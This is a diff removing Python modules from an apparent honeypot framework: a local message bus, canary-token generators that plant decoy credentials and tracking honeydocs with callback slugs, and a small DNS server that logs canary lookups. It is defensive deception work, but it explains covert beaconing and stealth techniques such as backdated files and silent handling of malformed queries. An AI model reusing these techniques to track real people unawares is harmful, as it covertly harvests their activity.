    """Apply a single client frame to *conn* / the bus.

    Raises:
        protocol.ProtocolError: for ``SUB`` without a pattern, ``PUB``
            without a topic, or any verb a client is not allowed to send.
    """
    verb = frame.verb

    if verb == protocol.HELLO:
        # An empty HELLO argument keeps the existing peer name.
        conn.peer_name = frame.args or conn.peer_name
        log.debug("bus.server: HELLO from %s", conn.peer_name)
    elif verb == protocol.SUB:
        pattern = frame.args
        if not pattern:
            raise protocol.ProtocolError("SUB requires a pattern")
        conn.patterns.add(pattern)
        log.debug("bus.server: %s SUB %s", conn.peer_name, pattern)
    elif verb == protocol.UNSUB:
        conn.patterns.discard(frame.args)
    elif verb == protocol.PUB:
        topic = frame.args
        if not topic:
            raise protocol.ProtocolError("PUB requires a topic")
        body = protocol.decode_body(frame.body) if frame.body else {}
        # Missing or falsy fields fall back to an empty payload / type.
        self._fanout(
            Event(
                topic=topic,
                payload=body.get("payload", {}) or {},
                type=body.get("type", "") or "",
            ),
            origin=conn,
        )
    elif verb == protocol.BYE:
        # Nothing to do here; the reader loop stops after BYE.
        pass
    else:
        # EVT is server-to-client only; receiving one is a protocol violation.
        raise protocol.ProtocolError(f"unexpected verb {frame.verb!r} from client")
|
||||
|
||||
def _fanout(self, event: Event, *, origin: _Connection | None = None) -> None:
    """Queue *event* as an EVT frame for every subscribed connection.

    The frame is encoded once and the same bytes are shared by all
    recipients. The *origin* connection (the publisher, if any) and
    connections already marked closed are skipped. If encoding fails
    the event is logged and dropped.
    """
    topic = event.topic
    try:
        wire = protocol.encode(protocol.EVT, args=topic, body=event.to_dict())
    except protocol.ProtocolError:
        log.exception("bus.server: failed to encode EVT for topic=%s", event.topic)
        return

    for peer in self._connections:
        if peer is origin or peer.closed:
            continue
        # Deliver at most once per connection, on the first matching pattern.
        for pattern in peer.patterns:
            if matches(pattern, topic):
                _enqueue_drop_oldest(peer.outbound, wire, topic)
                break
|
||||
|
||||
async def _writer_loop(self, conn: _Connection) -> None:
|
||||
"""Serialize writes onto *conn*'s socket.
|
||||
|
||||
One writer task per connection so a slow peer only blocks its own
|
||||
queue, not the fan-out loop. The queue is bounded with drop-oldest
|
||||
policy applied at enqueue time (see :func:`_enqueue_drop_oldest`).
|
||||
"""
|
||||
try:
|
||||
while not conn.closed:
|
||||
data = await conn.outbound.get()
|
||||
conn.writer.write(data)
|
||||
await conn.writer.drain()
|
||||
except (ConnectionError, BrokenPipeError):
|
||||
log.debug("bus.server: %s writer: peer closed", conn.peer_name)
|
||||
except asyncio.CancelledError:
|
||||
pass
|
||||
except Exception: # pragma: no cover - defensive
|
||||
log.exception("bus.server: writer loop crashed for %s", conn.peer_name)
|
||||
|
||||
async def _close_connection(self, conn: _Connection) -> None:
|
||||
if conn.closed:
|
||||
return
|
||||
conn.closed = True
|
||||
with contextlib.suppress(Exception):
|
||||
conn.writer.close()
|
||||
await conn.writer.wait_closed()
|
||||
|
||||
|
||||
# ─── Helpers ─────────────────────────────────────────────────────────────────
|
||||
|
||||
def _chmod_and_chown(path: pathlib.Path, mode: int, group: str | None) -> None:
|
||||
"""Apply socket file perms and best-effort group ownership.
|
||||
|
||||
If *group* is ``None`` or the named group does not exist, we leave the
|
||||
socket owned by the current process group. This keeps the server
|
||||
usable on dev boxes that don't have a ``decnet`` group set up.
|
||||
"""
|
||||
try:
|
||||
os.chmod(path, mode)
|
||||
except OSError as exc:
|
||||
log.warning("bus.server: chmod(%s, %o) failed: %s", path, mode, exc)
|
||||
|
||||
if not group:
|
||||
return
|
||||
try:
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
except KeyError:
|
||||
log.debug("bus.server: group %r not found, leaving socket group unchanged", group)
|
||||
return
|
||||
try:
|
||||
os.chown(path, -1, gid)
|
||||
except PermissionError:
|
||||
# Dev box running as an unprivileged user can't chown. Log once at
|
||||
# debug and move on — the socket is still usable by the owner.
|
||||
log.debug("bus.server: chown(%s, gid=%d) denied; leaving as-is", path, gid)
|
||||
except OSError as exc:
|
||||
log.warning("bus.server: chown(%s, gid=%d) failed: %s", path, gid, exc)
|
||||
|
||||
|
||||
def _enqueue_drop_oldest(
|
||||
queue: "asyncio.Queue[bytes]", data: bytes, topic: str,
|
||||
) -> None:
|
||||
"""Drop-oldest backpressure — mirrors :func:`decnet.bus.fake._enqueue_drop_oldest`."""
|
||||
while True:
|
||||
try:
|
||||
queue.put_nowait(data)
|
||||
return
|
||||
except asyncio.QueueFull:
|
||||
try:
|
||||
queue.get_nowait()
|
||||
log.warning("bus.server: subscriber queue full, dropped event topic=%s", topic)
|
||||
except asyncio.QueueEmpty:
|
||||
return
|
||||
@@ -1,121 +0,0 @@
|
||||
"""``decnet bus`` worker entrypoint.
|
||||
|
||||
Starts a :class:`~decnet.bus.unix_server.BusServer` on the configured UNIX
|
||||
socket and serves forever, emitting a ``system.bus.health`` heartbeat on
|
||||
its own bus every :data:`HEARTBEAT_INTERVAL_SEC` seconds so liveness-aware
|
||||
consumers (dashboards, watchdogs) can tell the bus is up without polling
|
||||
the filesystem.
|
||||
|
||||
Cross-host federation is **out of scope** for the MVP; each host runs its
|
||||
own bus independently. See DEBT-029 for the deferred ``--bridge-tcp``
|
||||
mode that would proxy the socket over the swarm mTLS channel.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import pathlib
|
||||
import signal
|
||||
import time
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.unix_server import BusServer
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.worker")
|
||||
|
||||
HEARTBEAT_INTERVAL_SEC = 10
|
||||
|
||||
|
||||
async def bus_worker(
    socket_path: str | pathlib.Path,
    *,
    group: str | None = "decnet",
    heartbeat_interval: int = HEARTBEAT_INTERVAL_SEC,
) -> None:
    """Run the bus server until cancelled or SIGTERM/SIGINT arrives.

    The directory that will hold *socket_path* is checked by
    :func:`_ensure_parent` before the server starts. In production
    systemd's ``RuntimeDirectory=decnet`` is expected to provide it; the
    right perms/owner depend on the deployment, so this function does
    not decide them.
    """
    path = pathlib.Path(socket_path)
    _ensure_parent(path)

    server = BusServer(path, group=group)
    await server.start()
    log.info("bus.worker: pid=%d socket=%s", os.getpid(), path)

    stop_event = asyncio.Event()
    _install_signal_handlers(stop_event)

    # Heartbeat first, then the accept loop.
    background = (
        asyncio.create_task(_heartbeat_loop(server, heartbeat_interval)),
        asyncio.create_task(server.serve_forever()),
    )

    try:
        await stop_event.wait()
        log.info("bus.worker: shutdown signal received")
    finally:
        for task in background:
            task.cancel()
        # NOTE(review): the serve task is awaited before ``server.close()``
        # disconnects clients; on Python 3.12+ the cancelled serve task
        # may wait for active connections first. Confirm shutdown with a
        # connected client.
        for task in background:
            try:
                await task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001 - draining shutdown
                pass
        await server.close()
        log.info("bus.worker: stopped")
|
||||
|
||||
|
||||
async def _heartbeat_loop(server: BusServer, interval: int) -> None:
|
||||
"""Publish ``system.bus.health`` on the server's own fan-out."""
|
||||
started_at = time.time()
|
||||
while True:
|
||||
try:
|
||||
await server.publish(
|
||||
topics.system(topics.SYSTEM_BUS_HEALTH),
|
||||
{
|
||||
"pid": os.getpid(),
|
||||
"uptime_sec": round(time.time() - started_at, 3),
|
||||
"ts": time.time(),
|
||||
},
|
||||
event_type=topics.SYSTEM_BUS_HEALTH,
|
||||
)
|
||||
except Exception: # pragma: no cover - heartbeat must never kill the worker
|
||||
log.exception("bus.worker: heartbeat publish failed")
|
||||
await asyncio.sleep(interval)
|
||||
|
||||
|
||||
def _install_signal_handlers(stop_event: asyncio.Event) -> None:
|
||||
loop = asyncio.get_running_loop()
|
||||
for sig in (signal.SIGTERM, signal.SIGINT):
|
||||
try:
|
||||
loop.add_signal_handler(sig, stop_event.set)
|
||||
except (NotImplementedError, RuntimeError):
|
||||
# add_signal_handler is not supported on Windows / in some
|
||||
# test harnesses where the loop is running in a non-main thread.
|
||||
# The worker still exits via KeyboardInterrupt bubbling up.
|
||||
pass
|
||||
|
||||
|
||||
def _ensure_parent(path: pathlib.Path) -> None:
|
||||
parent = path.parent
|
||||
if parent.exists():
|
||||
return
|
||||
# Dev-box convenience: if the parent is the user's ``~/.decnet`` dir,
|
||||
# create it. We do not auto-mkdir ``/run/decnet`` — that's systemd's job
|
||||
# and silently creating it as the wrong user would cause permission
|
||||
# confusion later.
|
||||
home_prefix = pathlib.Path.home() / ".decnet"
|
||||
try:
|
||||
parent.relative_to(home_prefix.parent)
|
||||
except ValueError:
|
||||
raise FileNotFoundError(
|
||||
f"bus socket parent {parent} does not exist; create it first"
|
||||
)
|
||||
parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
|
||||
__all__ = ["bus_worker", "HEARTBEAT_INTERVAL_SEC"]
|
||||
@@ -1,37 +0,0 @@
|
||||
"""Canary tokens — decoy artifacts planted in decky filesystems.
|
||||
|
||||
Public surface is exported here so callers can ``from decnet.canary
|
||||
import CanaryArtifact, get_generator, get_instrumenter`` without
|
||||
knowing the submodule layout. Concrete generators / instrumenters
|
||||
live under :mod:`decnet.canary.generators` and
|
||||
:mod:`decnet.canary.instrumenters` respectively; the factory keeps
|
||||
import-time cost down by deferring those imports until first use
|
||||
(same pattern as :mod:`decnet.intel.factory`).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryGenerator,
|
||||
CanaryInstrumenter,
|
||||
)
|
||||
from decnet.canary.factory import (
|
||||
KNOWN_GENERATORS,
|
||||
KNOWN_INSTRUMENTERS,
|
||||
get_generator,
|
||||
get_instrumenter,
|
||||
pick_instrumenter_for_mime,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
"CanaryArtifact",
|
||||
"CanaryContext",
|
||||
"CanaryGenerator",
|
||||
"CanaryInstrumenter",
|
||||
"KNOWN_GENERATORS",
|
||||
"KNOWN_INSTRUMENTERS",
|
||||
"get_generator",
|
||||
"get_instrumenter",
|
||||
"pick_instrumenter_for_mime",
|
||||
]
|
||||
@@ -1,145 +0,0 @@
|
||||
"""Canary generator / instrumenter ABCs and the artifact dataclass.
|
||||
|
||||
Two flavors of producer share the same return shape:
|
||||
|
||||
* :class:`CanaryGenerator` synthesises a fake artifact from scratch
|
||||
(e.g. a plausible ``~/.aws/credentials`` block, a ``.git/config``
|
||||
pointing at an attacker-bait remote URL). Operators don't supply
|
||||
any input.
|
||||
|
||||
* :class:`CanaryInstrumenter` mutates an operator-uploaded blob to
|
||||
embed the callback (HTTP slug + DNS host). The original blob bytes
|
||||
are passed in; the instrumenter returns the mutated version.
|
||||
|
||||
Both return a :class:`CanaryArtifact` — the planter doesn't care
|
||||
which path produced it. Same dataclass keeps the planter's
|
||||
docker-exec injector trivial.
|
||||
|
||||
ABCs intentionally do not include I/O — generators and instrumenters
|
||||
are pure functions of (slug, host, blob?). All filesystem work
|
||||
happens in :mod:`decnet.canary.planter` and :mod:`decnet.canary.storage`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Optional
|
||||
|
||||
|
||||
@dataclass
class CanaryContext:
    """Everything a generator/instrumenter needs to embed a callback.

    The same ``callback_token`` slug is used verbatim in HTTP URLs
    (``https://<host>/c/<callback_token>``) and as the leftmost DNS
    label (``<callback_token>.canary.<dns_zone>``), so one slug maps to
    one :class:`CanaryToken` row whichever path the attacker trips.

    ``http_base`` and ``dns_zone`` are taken from the canary worker's
    public-facing config (``DECNET_CANARY_HTTP_BASE``,
    ``DECNET_CANARY_DNS_ZONE``). With no DNS deployment ``dns_zone`` is
    empty, and instrumenters whose only realistic embed point is a
    hostname raise.
    """

    #: Unique slug identifying the token.
    callback_token: str
    #: e.g. "https://canary.example.test" — no trailing slash
    http_base: str
    #: e.g. "canary.example.test"; "" disables DNS embeds
    dns_zone: str = ""
    #: "linux" | "windows" — drives default username, path style
    persona: str = "linux"
|
||||
|
||||
|
||||
@dataclass
class CanaryArtifact:
    """What a generator/instrumenter hands back: bytes plus placement."""

    #: Absolute path inside the target container.
    path: str

    #: Final bytes that hit the decky filesystem. Always raw bytes —
    #: the planter base64-encodes for the wire so binary blobs
    #: (DOCX/PNG/PDF) survive ``docker exec sh -c`` safely.
    content: bytes

    #: Unix file mode. ``0600`` by default because most realistic
    #: canary placements (``~/.aws/credentials``, ``.env``, ``id_rsa``)
    #: are operator-only. Honeydocs in user docs folders should pass
    #: ``0o644``.
    mode: int = 0o600

    #: Seconds relative to *now* for the planted file's mtime. Negative
    #: values backdate the file so it doesn't look like it appeared the
    #: moment the decky was deployed. ``-86400 * 90`` (90 days ago) is
    #: a common choice for ``honeydoc`` artifacts; ``0`` means "stamp it
    #: now," which is fine for ``aws_creds``-like files that would
    #: plausibly be touched recently.
    mtime_offset: int = 0

    #: Identifier of the instrumenter that produced this artifact (for
    #: upload-driven tokens). Mirrored into ``CanaryToken.instrumenter``.
    #: Mutually exclusive with :attr:`generator`.
    instrumenter: Optional[str] = None

    #: Identifier of the generator that produced this artifact (for
    #: synthesised tokens). Mirrored into ``CanaryToken.generator``.
    #: Mutually exclusive with :attr:`instrumenter`.
    generator: Optional[str] = None

    #: Human-readable notes about the embedding (e.g. "DOCX: injected
    #: 1×1 remote image at relsId rId99"). Surfaced in the API
    #: ``preview`` response so the operator sees what we did before
    #: planting. Never leaked to the attacker-facing surface.
    notes: list[str] = field(default_factory=list)
|
||||
|
||||
|
||||
class CanaryGenerator(ABC):
    """Base class for producers that synthesise an artifact from scratch."""

    #: short tag — matches ``CanaryToken.generator``
    name: str

    @abstractmethod
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the artifact for *ctx*.

        Contract for implementations: no I/O, and deterministic output
        for the same ``(callback_token, http_base, dns_zone, persona)``.
        Re-seeding from :attr:`CanaryToken.secret_seed` then yields
        byte-identical bytes, which makes the planter naturally
        idempotent.
        """
|
||||
|
||||
|
||||
class CanaryInstrumenter(ABC):
    """Base class for producers that embed a callback in an uploaded blob."""

    #: short tag — matches ``CanaryToken.instrumenter``
    name: str

    #: MIME prefixes this instrumenter handles. The factory uses these
    #: to dispatch by sniffed content-type. Sub-string match against
    #: the prefix list (e.g. ``("application/pdf",)`` or
    #: ``("text/",)``).
    mime_prefixes: tuple[str, ...] = ()

    @abstractmethod
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return an artifact whose bytes are *blob* with the callback embedded.

        Implementations MUST raise :class:`InstrumenterRejectedError`
        when the blob cannot be mutated safely (corrupt zip, encrypted
        PDF, etc.). The API can then answer 400 with the specific
        reason instead of silently shipping the original bytes.
        """
|
||||
|
||||
|
||||
class InstrumenterRejectedError(ValueError):
    """Signals that an instrumenter refused to mutate its input safely."""
|
||||
@@ -1,181 +0,0 @@
|
||||
"""Realism contract adapter for canary generators.
|
||||
|
||||
Stage 7 of the realism migration. The orchestrator's planner picks a
|
||||
``canary_*`` :class:`~decnet.realism.taxonomy.ContentClass` 1–3% of
|
||||
the time on file ticks; this module turns that pick into a
|
||||
:class:`~decnet.canary.base.CanaryArtifact` (bytes the SSH driver
|
||||
plants) plus a persisted :class:`~decnet.web.db.models.CanaryToken`
|
||||
row so the canary worker recognises the slug when an attacker trips
|
||||
it.
|
||||
|
||||
What this is NOT: it doesn't pick *when* canaries fire — that's the
|
||||
realism planner's job. It doesn't decide *where* on the filesystem
|
||||
the canary lands beyond what realism naming + persona conventions
|
||||
already produce. It's a thin bytes-and-row factory bolted onto the
|
||||
realism contract.
|
||||
|
||||
Stealth (per ``feedback_stealth.md``): we never leak the
|
||||
``DECNET`` literal into anything that survives to the planted file.
|
||||
The underlying generators are already stealth-clean; this wrapper
|
||||
must not undo that.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import secrets as _secrets
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.logging import get_logger
|
||||
from decnet.realism.personas import login_for
|
||||
from decnet.realism.taxonomy import ContentClass, Plan
|
||||
|
||||
log = get_logger("canary.cultivator")
|
||||
|
||||
|
||||
# realism content_class → canary generator name. Mirrors
|
||||
# :data:`decnet.canary.factory.KNOWN_GENERATORS`.
|
||||
_CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_AWS_CREDS: "aws_creds",
|
||||
ContentClass.CANARY_ENV_FILE: "env_file",
|
||||
ContentClass.CANARY_GIT_CONFIG: "git_config",
|
||||
ContentClass.CANARY_SSH_KEY: "ssh_key",
|
||||
ContentClass.CANARY_HONEYDOC: "honeydoc",
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||
}
|
||||
|
||||
|
||||
# Generator → CanaryKind. The trip surface (HTTP slug callback / DNS
|
||||
# resolution / passive bait) determines how the canary worker matches
|
||||
# an attacker callback to this token. Aligned with
|
||||
# :data:`decnet.web.db.models.canary.CanaryKind`.
|
||||
_GENERATOR_TO_KIND: dict[str, str] = {
|
||||
"aws_creds": "aws_passive", # no embedded callback; passive bait
|
||||
"env_file": "http",
|
||||
"git_config": "http",
|
||||
"honeydoc": "http",
|
||||
"honeydoc_docx": "http",
|
||||
"honeydoc_pdf": "http",
|
||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||
}
|
||||
|
||||
|
||||
# Path conventions per generator. The realism planner doesn't know
|
||||
# about decoy-realistic credential locations (``~/.aws/credentials``,
|
||||
# ``~/.git/config``); we map them per-class here so the planted
|
||||
# artifact lands somewhere an attacker would actually look.
|
||||
_DEFAULT_PATH: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_AWS_CREDS: "/home/{persona}/.aws/credentials",
|
||||
ContentClass.CANARY_ENV_FILE: "/home/{persona}/app/.env",
|
||||
ContentClass.CANARY_GIT_CONFIG: "/home/{persona}/.git/config",
|
||||
ContentClass.CANARY_SSH_KEY: "/home/{persona}/.ssh/id_rsa",
|
||||
ContentClass.CANARY_HONEYDOC: "/home/{persona}/Documents/notes.html",
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||
}
|
||||
|
||||
|
||||
def _path_for(plan: Plan) -> str:
|
||||
"""Produce the canary placement path for *plan*.
|
||||
|
||||
The realism planner already filled in ``plan.target_path`` from
|
||||
the namer, but canary placements have stronger conventions
|
||||
(``~/.aws/credentials``, ``~/.ssh/id_rsa``) than the realism
|
||||
namer's vocabulary. When :data:`_DEFAULT_PATH` has an entry,
|
||||
that wins.
|
||||
"""
|
||||
template = _DEFAULT_PATH.get(plan.content_class)
|
||||
if template is None:
|
||||
return plan.target_path
|
||||
return template.format(persona=login_for(plan.persona))
|
||||
|
||||
|
||||
def _new_callback_token() -> str:
|
||||
"""16 url-safe bytes — same shape canary slug fields use elsewhere."""
|
||||
return _secrets.token_urlsafe(16)
|
||||
|
||||
|
||||
async def cultivate(
    plan: Plan,
    repo: Any,
    *,
    http_base: Optional[str] = None,
    dns_zone: Optional[str] = None,
    created_by: str = "system",
) -> CanaryArtifact:
    """Turn a realism *plan* with a canary content class into a plantable artifact.

    Steps: mint a callback token, build a :class:`CanaryContext`, let
    the mapped generator produce the bytes, persist a ``canary_tokens``
    row through *repo*, and return the artifact (carrying the placement
    path) for the SSH driver to plant.

    *http_base* / *dns_zone* fall back to the
    ``DECNET_CANARY_HTTP_BASE`` / ``DECNET_CANARY_DNS_ZONE`` environment
    variables when not supplied — same pattern the canary worker uses.
    If both end up empty, generators that need a callback host
    (``ssh_key`` DNS, ``mysql_dump``) raise; the planner's caller logs
    that and falls back to a non-canary plan.

    Raises:
        ValueError: *plan*'s content class is not a canary class.
        KeyError: no generator is mapped for the content class.
    """
    content_class = plan.content_class
    if not content_class.is_canary():
        raise ValueError(
            f"cultivate() called with non-canary content_class="
            f"{content_class!r}"
        )
    if content_class not in _CLASS_TO_GENERATOR:
        raise KeyError(
            f"no canary generator mapped for content_class="
            f"{content_class!r}"
        )
    gen_name = _CLASS_TO_GENERATOR[content_class]

    callback_token = _new_callback_token()
    env = os.environ
    ctx = CanaryContext(
        callback_token=callback_token,
        http_base=http_base or env.get("DECNET_CANARY_HTTP_BASE", ""),
        dns_zone=dns_zone or env.get("DECNET_CANARY_DNS_ZONE", ""),
        persona="linux",  # all our deckies are POSIX in MVP
    )
    artifact = get_generator(gen_name).generate(ctx)

    # Generators return ``path=""`` (the planter normally fills it). We
    # already hold a realism-derived path, so use it for both the SSH
    # driver's plant_file call and the canary_tokens row.
    placement_path = _path_for(plan)

    # The row is written before planting so the canary worker can
    # attribute a callback even if the artifact trips during the plant
    # itself (improbable but possible — DOCX viewers can preview
    # autoplay-style).
    token_row = {
        "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
        "decky_name": plan.decky_name,
        "instrumenter": None,
        "generator": gen_name,
        "placement_path": placement_path,
        "callback_token": callback_token,
        "secret_seed": callback_token,  # deterministic re-seed compatible
        "placed_at": datetime.now(timezone.utc),
        "created_by": created_by,
        "state": "planted",
    }
    await repo.create_canary_token(token_row)

    # Return a copy carrying the placement path rather than mutating
    # the generator's own artifact.
    return CanaryArtifact(
        path=placement_path,
        content=artifact.content,
        mode=artifact.mode,
        mtime_offset=artifact.mtime_offset,
        instrumenter=artifact.instrumenter,
        generator=artifact.generator,
        notes=list(artifact.notes),
    )
|
||||
@@ -1,207 +0,0 @@
|
||||
"""Minimal authoritative DNS server for canary tokens (stdlib only).
|
||||
|
||||
We don't need a full resolver — only enough to:
|
||||
|
||||
1. Decode an inbound query's qname.
|
||||
2. If the qname matches ``<slug>.<canary_zone>``, log the callback,
|
||||
publish ``canary.<token_id>.triggered`` on the bus, and return a
|
||||
plausible A record (any RFC-5737 reserved address would do; we
|
||||
use 192.0.2.1) so the attacker's resolver doesn't loop on
|
||||
NXDOMAIN.
|
||||
3. For unknown qnames return NXDOMAIN.
|
||||
|
||||
DNS-over-UDP wire format is well-trodden: 12-byte header + name
|
||||
labels + qtype + qclass. We implement just the bits we need.
|
||||
|
||||
This module deliberately avoids the ``dnslib`` PyPI package so the
|
||||
canary worker has no extra dependency surface. If we ever need
|
||||
EDNS0, DNSSEC, or other niceties we'll swap to dnslib then.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import struct
|
||||
from dataclasses import dataclass
|
||||
from typing import Awaitable, Callable, Optional, Tuple
|
||||
|
||||
|
||||
@dataclass(frozen=True)
class DNSQuery:
    """Immutable view of one parsed DNS question (only the fields the worker needs)."""

    #: Transaction id from the packet header.
    txid: int
    #: Queried name — lowercase, no trailing dot.
    qname: str
    #: Question type code.
    qtype: int
    #: Question class code.
    qclass: int
    #: Raw 16-bit flags word from the packet header.
    flags: int
|
||||
|
||||
|
||||
def _decode_name(buf: bytes, offset: int) -> Tuple[str, int]:
|
||||
"""Return ``(qname_lowercase_no_dot, bytes_consumed)``.
|
||||
|
||||
Supports compressed pointers (RFC 1035 §4.1.4). Doesn't recurse —
|
||||
we walk the pointer chain iteratively with a hop cap to avoid
|
||||
pointer-loop DoS.
|
||||
"""
|
||||
labels: list[str] = []
|
||||
pos = offset
|
||||
consumed = 0
|
||||
jumped = False
|
||||
hops = 0
|
||||
while True:
|
||||
if pos >= len(buf):
|
||||
raise ValueError("truncated DNS name")
|
||||
length = buf[pos]
|
||||
if length == 0:
|
||||
pos += 1
|
||||
if not jumped:
|
||||
consumed = pos - offset
|
||||
break
|
||||
if (length & 0xC0) == 0xC0:
|
||||
# Compression pointer.
|
||||
if pos + 1 >= len(buf):
|
||||
raise ValueError("truncated DNS pointer")
|
||||
ptr = ((length & 0x3F) << 8) | buf[pos + 1]
|
||||
if not jumped:
|
||||
consumed = (pos + 2) - offset
|
||||
pos = ptr
|
||||
jumped = True
|
||||
hops += 1
|
||||
if hops > 10:
|
||||
raise ValueError("DNS pointer loop")
|
||||
continue
|
||||
pos += 1
|
||||
if pos + length > len(buf):
|
||||
raise ValueError("truncated DNS label")
|
||||
labels.append(buf[pos:pos + length].decode("ascii", "replace"))
|
||||
pos += length
|
||||
return ".".join(labels).lower(), consumed
|
||||
|
||||
|
||||
def parse_query(packet: bytes) -> DNSQuery:
    """Decode the header and the single question of a DNS query packet.

    Raises:
        ValueError: the packet is shorter than a DNS header, does not
            carry exactly one question, or is truncated.
    """
    header_len = 12
    if len(packet) < header_len:
        raise ValueError("DNS packet too short")

    # Only id, flags and the question count are used; the other three
    # section counts are ignored.
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack_from("!HHHHHH", packet, 0)
    if qdcount != 1:
        raise ValueError(f"expected 1 question, got {qdcount}")

    qname, consumed = _decode_name(packet, header_len)
    tail = header_len + consumed
    if tail + 4 > len(packet):
        raise ValueError("truncated DNS qtype/qclass")
    qtype, qclass = struct.unpack_from("!HH", packet, tail)

    return DNSQuery(txid=txid, qname=qname, qtype=qtype, qclass=qclass, flags=flags)
|
||||
|
||||
|
||||
def _encode_name(name: str) -> bytes:
|
||||
out = bytearray()
|
||||
for label in name.split("."):
|
||||
if not label:
|
||||
continue
|
||||
b = label.encode("ascii", "replace")
|
||||
out.append(len(b))
|
||||
out.extend(b)
|
||||
out.append(0)
|
||||
return bytes(out)
|
||||
|
||||
|
||||
def _build_response(
|
||||
query: DNSQuery,
|
||||
*,
|
||||
rcode: int = 0,
|
||||
answer_ip: Optional[str] = None,
|
||||
) -> bytes:
|
||||
"""Encode a DNS response packet.
|
||||
|
||||
*rcode* 0 = NOERROR, 3 = NXDOMAIN. When *answer_ip* is supplied
|
||||
and the query was for an A record we include exactly one answer
|
||||
(TTL 60, class IN).
|
||||
"""
|
||||
qd_count = 1
|
||||
an_count = 1 if (answer_ip and query.qtype == 1 and rcode == 0) else 0
|
||||
flags = 0x8400 | rcode # response + authoritative + RA bit clear + rcode
|
||||
header = struct.pack(
|
||||
"!HHHHHH", query.txid, flags, qd_count, an_count, 0, 0,
|
||||
)
|
||||
qname_bytes = _encode_name(query.qname)
|
||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||
|
||||
answer = b""
|
||||
if an_count:
|
||||
# Use a name pointer back to the question (offset 12).
|
||||
ptr = struct.pack("!H", 0xC000 | 12)
|
||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||
answer = ptr + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
|
||||
|
||||
return header + question + answer
|
||||
|
||||
|
||||
# Hook signature: receives the matched slug, the parsed query and the
# sender's address (first element of the datagram's source address);
# returns nothing. The worker uses it to persist a CanaryTrigger row
# and publish the bus event.
|
||||
TriggerHook = Callable[[str, DNSQuery, str], Awaitable[None]]
|
||||
|
||||
|
||||
class CanaryDNSProtocol(asyncio.DatagramProtocol):
    """asyncio UDP endpoint that answers canary DNS callbacks.

    Built from the canary zone (``"canary.example.test"``) and a
    coroutine function invoked when a query matches ``<slug>.<zone>``.
    The hook runs as its own task, so the receive path never waits on
    it.
    """

    def __init__(
        self,
        zone: str,
        hook: TriggerHook,
        *,
        answer_ip: str = "192.0.2.1",
    ) -> None:
        """Store configuration; no socket work happens here.

        Args:
            zone: canary zone; case and leading/trailing dots are
                normalised away. An empty zone matches nothing.
            hook: awaited as ``hook(slug, query, source_ip)`` for every
                matching query.
            answer_ip: IPv4 address returned in A answers.
        """
        # Normalise: lowercase, no leading/trailing dot.
        self._zone = zone.lower().strip(".")
        self._suffix = "." + self._zone if self._zone else ""
        self._hook = hook
        self._answer_ip = answer_ip
        self._transport: Optional[asyncio.DatagramTransport] = None
        # The event loop keeps only weak references to tasks. Holding
        # them here stops a running hook from being garbage-collected
        # before it finishes.
        self._hook_tasks: set[asyncio.Task] = set()

    def connection_made(self, transport) -> None:  # type: ignore[override]
        """Remember the transport so replies can be sent."""
        self._transport = transport  # type: ignore[assignment]

    def datagram_received(  # type: ignore[override]
        self, data: bytes, addr: Tuple[str, int],
    ) -> None:
        """Answer one inbound datagram and fire the hook on a slug match."""
        try:
            query = parse_query(data)
        except ValueError:
            # Malformed query — drop silently. Returning a FORMERR
            # would tip off the attacker that *something* is listening
            # on this port; the stealth posture (feedback_stealth)
            # prefers radio silence on parse errors.
            return

        if query.flags & 0x8000:
            # QR bit set: this is a response, not a query. Answering it
            # would let a spoofed packet bounce replies between two
            # servers, and a response is never a canary trip.
            return

        slug = self._slug_for(query.qname)
        if slug is None:
            # Unknown name — NXDOMAIN.
            self._send(addr, _build_response(query, rcode=3))
            return

        # Known name — answer with our sinkhole IP, then fire the hook.
        self._send(addr, _build_response(query, answer_ip=self._answer_ip))
        task = asyncio.create_task(self._hook(slug, query, addr[0]))
        self._hook_tasks.add(task)
        task.add_done_callback(self._hook_tasks.discard)

    def _slug_for(self, qname: str) -> Optional[str]:
        """Return the slug if *qname* is ``<slug>.<zone>``, else ``None``."""
        if not self._zone or not qname.endswith(self._suffix):
            return None
        slug = qname[: -len(self._suffix)]
        # Single-label slug only; multi-label means the attacker is
        # querying a sub-resource we don't model.
        if not slug or "." in slug:
            return None
        return slug

